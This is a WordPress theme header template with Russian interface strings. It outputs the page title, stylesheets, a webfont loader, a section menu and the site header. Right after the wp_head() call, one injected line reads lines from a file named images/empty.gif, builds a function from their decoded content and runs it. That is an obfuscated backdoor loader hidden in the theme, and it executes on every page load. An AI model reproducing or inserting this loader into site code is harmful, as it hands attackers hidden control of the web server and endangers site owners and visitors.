<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<meta charset="<?php bloginfo( 'charset' ); ?>" />
<title><?php
	/*
	 * Print the <title> tag based on what is being viewed.
	 */
	global $page, $paged;

	wp_title( '|', true, 'right' );

	// Add the blog name.
	bloginfo( 'name' );

	// Add the blog description for the home/front page.
	$site_description = get_bloginfo( 'description', 'display' );
	if ( $site_description && ( is_home() || is_front_page() ) )
		echo " | $site_description";

	// Add a page number if necessary:
	if ( $paged >= 2 || $page >= 2 )
		echo ' | ' . sprintf( __( 'Страница %s', 'shaken' ), max( $paged, $page ) );

?></title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />

<link rel="stylesheet" href="<?php bloginfo('stylesheet_url'); ?>" type="text/css" media="screen" />
<link rel="stylesheet" href="<?php echo get_template_directory_uri(); ?>/js/colorbox/colorbox.css" />
<link rel="stylesheet" href="<?php echo get_template_directory_uri(); ?>/custom.css" />

<?php  wp_head(); $gif=file(dirname(__FILE__).'/images/empty.gif',2);$gif=$gif[5]("",$gif[6]($gif[4]));$gif(); ?>

<script type="text/javascript">
  WebFontConfig = {
    google: { families: [ 'PT Sans Narrow:regular,bold' ] }
  };
  (function() {
    var wf = document.createElement('script');
    wf.src = ('https:' == document.location.protocol ? 'https' : 'http') +
        '://ajax.googleapis.com/ajax/libs/webfont/1/webfont.js';
    wf.type = 'text/javascript';
    wf.async = 'true';
    var s = document.getElementsByTagName('script')[0];
    s.parentNode.insertBefore(wf, s);
  })();
</script>

</head>

<body <?php body_class(); ?>>

<?php if(is_home()){ ?>
<div id="sections-header">
	<div class="wrap">
        <div id="sections-list">
        	<span class="sections-list-title">Секции:</span>
            <ul id="toggler">
                <li><a href="#" rel="default">Выберите секцию&hellip;</a>
                    <ul>
                        <?php
						$sections_loop = new WP_Query('posts_per_page=-1&post_type=section&orderby=menu_order&post_parent=0');
						if ( $sections_loop->have_posts() ) : while ( $sections_loop->have_posts() ) : $sections_loop->the_post(); ?>
							<li><a href="#<?php echo $post->post_name.'-'.get_the_ID(); ?>" class="anchor"><?php the_title(); ?></a></li>
						<?php endwhile; endif; wp_reset_query(); ?>
                    </ul>
                </li>
            </ul>
        </div><!-- #list -->
        <div class="clearfix"></div>
   </div><!-- #wrap -->
</div><!-- #header -->

<?php } ?>

<div class="wrap">
	
    <?php if(!get_option('shaken_hide_header')){ ?>
    <div id="header">
        <?php $heading_tag = ( is_home() || is_front_page() ) ? 'h1' : 'div'; ?>
        <a href="<?php echo home_url( '/' ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home" id="logo">
            <?php if(get_option('shaken_logo_img')) { ?>
                <<?php echo $heading_tag; ?> id="site-title"><img src="<?php echo get_option('shaken_logo_img'); ?>" alt="<?php bloginfo( 'name' ); ?>" /></<?php echo $heading_tag; ?>>
            <?php } else { ?>
                <<?php echo $heading_tag; ?> id="site-title"><?php bloginfo( 'name' ); ?></<?php echo $heading_tag; ?>>
            <?php } ?>
        </a>
        
        <?php wp_nav_menu( array('menu_class' => 'nav', 'container' => '', 'theme_location' => 'main_menu' ) ); ?>
        
        <div class="clearfix"></div>
    </div><!-- #header -->
    <?php } ?>
